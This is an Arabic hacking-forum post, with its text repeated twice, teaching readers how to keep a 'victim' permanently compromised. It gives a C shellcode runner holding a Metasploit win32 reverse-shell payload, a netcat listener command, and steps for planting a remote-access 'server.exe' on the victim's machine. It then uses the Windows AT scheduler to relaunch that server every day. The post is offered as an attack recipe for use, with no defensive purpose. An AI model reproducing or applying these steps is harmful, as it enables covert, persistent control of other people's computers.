d4rK-h4ck3r
New Member
عدم فقدان الضحية بطريقة جديدة و مميزة من اكتشافي عن طريق command AT
كالعادة درس اول مرة في المنتديات العربية و انا اعتزل الهاكر اذا يقولي واحد ان فيه درس مثله لذلك ارجوا ذكر اسم الكاتب عند النقل
اولا تعريف AT command
هي عبارة عن امر مرتبط بزمان محدد على سبيل المثال لو اردنا فتح
notepad في منتصف الليل
نفتح الدوس ونكتب الامر التالي
AT 00:00 /interactive "notepad.exe"
00:00 وقت تنفيذ الامر
/interactive يعني الامر يشتغل مرة واحدة لاحقا سوف نتطرق لكيفية تنفيذ الامر في اي يوم من الاسبوع و بصفة دورية
notepad.exe الملف الذي نريد فتحه
مثال ثاني
لو اردنا فتح المسنجر الساعة 3 عصرا نعمل الامر التالي
AT 15:00 /interactive "C:\Program Files\Windows
Live\Messenger\msnmsgr.exe"
ان شاء الله تكونوا فهمتوا
الان كيف سيساعدنا هذا الكلام
الطريقة هي اننا نرفع السيرفر و نعمل الكومند حتى ينفتح السيرفر يوميا يعني حتى لو فقدنا الضحية السيرفر سينفتح تلقائي و جينا التبليغ يوميا يعني ضحية للابد
لذلك نبدا بعمل كونكت للجهاز الضحية بالدوس عن طريق الشل كود
نبدا بعمل شل كود نشوف الموقع هذا
http://metasploit.com:55555/PAYLOADS?MODE=SELECT&MODULE=win32_reverse
نعمل مثل في الصورة
ثم
نحفظ الكود و نستبدله بالجزء الملون في الكود التالي
#include <stdlib.h>
#include <string.h>
unsigned char shellcode[] =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x80"
"\x91\xc8\xad\x83\xeb\xfc\xe2\xf4\x7c\xfb\x23\xe0\x68\x68\x37\x52"
"\x7f\xf1\x43\xc1\xa4\xb5\x43\xe8\xbc\x1a\xb4\xa8\xf8\x90\x27\x26"
"\xcf\x89\x43\xf2\xa0\x90\x23\xe4\x0b\xa5\x43\xac\x6e\xa0\x08"";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}
الان نحفظ الكود الجديد باسم
shellcode.c
حمل برنامج devc++
نصبه ثم افتح الملف الجديد سينفتح لك ببرنامج السي ++ اختار
Execute ==> compile
عندها تتكون عندك ملف تنفيذي اسمه shellcode
الان نذهب للدوس ونعمل الامر
cd\
ثم الامر
nc -l -v -p 21
عوض 21 بالبورت الذي اخترته ( يجب ان يكون لديك النت كات في :c )
ارفع سيرفرك في هذا المسار C:\WINDOWS
ارفع الملف التنفيذي في جهاز الضحية ببرنامج اختراقك و شغله
ستلاحظ ان الدوس اتصل به الضحية يعني تنفذ الاوامر من الدوس تبعك وتنفذ في جهاز الضحية
الان نفذ الامر التالي
الان نفذ الامر التالي في الدوس اللي مخترقين بيه الضحية
AT 23:30 /EVERY:m,t,w,th,f,s,su C:\WINDOWS\server.exe
m,t,w,th,f,s,su عوضها ب l,ma,me,j,v,s,d
اذا كان جهازك يدعم اللغة الفرنسية
استبدل 23:30 بالوقت الذي تريد تشغيل فيه السيرفر
نفترض ان الاتصال انقطع مع الضحية فان السيرفر سيشغل نفسه ذاتيا كل يوم الساعة 23:30 و مبروك عليك ضحية دائمة
اعرف ان الدرس صعب قليلا لذلك انا موجود لاي استفسار
greetz to : Password
اولا تعريف AT command
هي عبارة عن امر مرتبط بزمان محدد على سبيل المثال لو اردنا فتح
notepad في منتصف الليل
نفتح الدوس ونكتب الامر التالي
AT 00:00 /interactive "notepad.exe"
00:00 وقت تنفيذ الامر
/interactive يعني الامر يشتغل مرة واحدة لاحقا سوف نتطرق لكيفية تنفيذ الامر في اي يوم من الاسبوع و بصفة دورية
notepad.exe الملف الذي نريد فتحه
مثال ثاني
لو اردنا فتح المسنجر الساعة 3 عصرا نعمل الامر التالي
AT 15:00 /interactive "C:\Program Files\Windows
Live\Messenger\msnmsgr.exe"
ان شاء الله تكونوا فهمتوا
الان كيف سيساعدنا هذا الكلام
الطريقة هي اننا نرفع السيرفر و نعمل الكومند حتى ينفتح السيرفر يوميا يعني حتى لو فقدنا الضحية السيرفر سينفتح تلقائي و جينا التبليغ يوميا يعني ضحية للابد
لذلك نبدا بعمل كونكت للجهاز الضحية بالدوس عن طريق الشل كود
نبدا بعمل شل كود نشوف الموقع هذا
http://metasploit.com:55555/PAYLOADS?MODE=SELECT&MODULE=win32_reverse
نعمل مثل في الصورة
ثم
نحفظ الكود و نستبدله بالجزء الملون في الكود التالي
#include <stdlib.h>
#include <string.h>
unsigned char shellcode[] =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x80"
"\x91\xc8\xad\x83\xeb\xfc\xe2\xf4\x7c\xfb\x23\xe0\x68\x68\x37\x52"
"\x7f\xf1\x43\xc1\xa4\xb5\x43\xe8\xbc\x1a\xb4\xa8\xf8\x90\x27\x26"
"\xcf\x89\x43\xf2\xa0\x90\x23\xe4\x0b\xa5\x43\xac\x6e\xa0\x08"";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}
الان نحفظ الكود الجديد باسم
shellcode.c
حمل برنامج devc++
نصبه ثم افتح الملف الجديد سينفتح لك ببرنامج السي ++ اختار
Execute ==> compile
عندها تتكون عندك ملف تنفيذي اسمه shellcode
الان نذهب للدوس ونعمل الامر
cd\
ثم الامر
nc -l -v -p 21
عوض 21 بالبورت الذي اخترته ( يجب ان يكون لديك النت كات في :c )
ارفع سيرفرك في هذا المسار C:\WINDOWS
ارفع الملف التنفيذي في جهاز الضحية ببرنامج اختراقك و شغله
ستلاحظ ان الدوس اتصل به الضحية يعني تنفذ الاوامر من الدوس تبعك وتنفذ في جهاز الضحية
الان نفذ الامر التالي
الان نفذ الامر التالي في الدوس اللي مخترقين بيه الضحية
AT 23:30 /EVERY:m,t,w,th,f,s,su C:\WINDOWS\server.exe
m,t,w,th,f,s,su عوضها ب l,ma,me,j,v,s,d
اذا كان جهازك يدعم اللغة الفرنسية
استبدل 23:30 بالوقت الذي تريد تشغيل فيه السيرفر
نفترض ان الاتصال انقطع مع الضحية فان السيرفر سيشغل نفسه ذاتيا كل يوم الساعة 23:30 و مبروك عليك ضحية دائمة
اعرف ان الدرس صعب قليلا لذلك انا موجود لاي استفسار
greetz to : Password
التعديل الأخير:
اسم الموضوع : عدم فقدان الضحية بطريقة جديدة و مميزة من اكتشافي عن طريق command AT
|
المصدر : قســم إختــراق الأجهــزة
